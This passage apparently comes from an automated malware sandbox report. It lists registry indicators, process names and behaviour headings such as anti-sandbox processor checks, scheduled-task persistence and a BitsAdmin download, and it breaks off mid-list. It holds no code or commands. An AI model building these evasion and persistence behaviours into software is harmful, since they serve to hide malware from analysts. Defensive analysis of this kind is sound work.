00000000000ffffffff000000000000000000000000312b64fa00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ZNjEI97V8_TzeA2vWbShf6jj.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName svchost.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
22222.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 22222.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz 22222.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision 22222.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier 22222.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 22222.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier 22222.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 6768 schtasks.exe 5188 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 25 IoCs
Processes:
WerFault.exe22222.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 22222.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU 22222.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
sihclient.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe -
Modifies registry class 4 IoCs
Processes:
description ioc process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 147 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 150 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WerFault.exemsedge.exemsedge.exeWerFault.exeidentity_helper.exeInstallation.exe9avfIn5IigP_u4pj8JpAtsYA.exeWerFault.exeWerFault.exeZNjEI97V8_TzeA2vWbShf6jj.exe22222.exeWerFault.exeWerFault.exeWerFault.exepid process 344 WerFault.exe 344 WerFault.exe 3644 msedge.exe 3644 msedge.exe 4696 msedge.exe 4696 msedge.exe 4700 WerFault.exe 4700 WerFault.exe 1500 identity_helper.exe 1500 identity_helper.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 4584 Installation.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 5916 9avfIn5IigP_u4pj8JpAtsYA.exe 5916 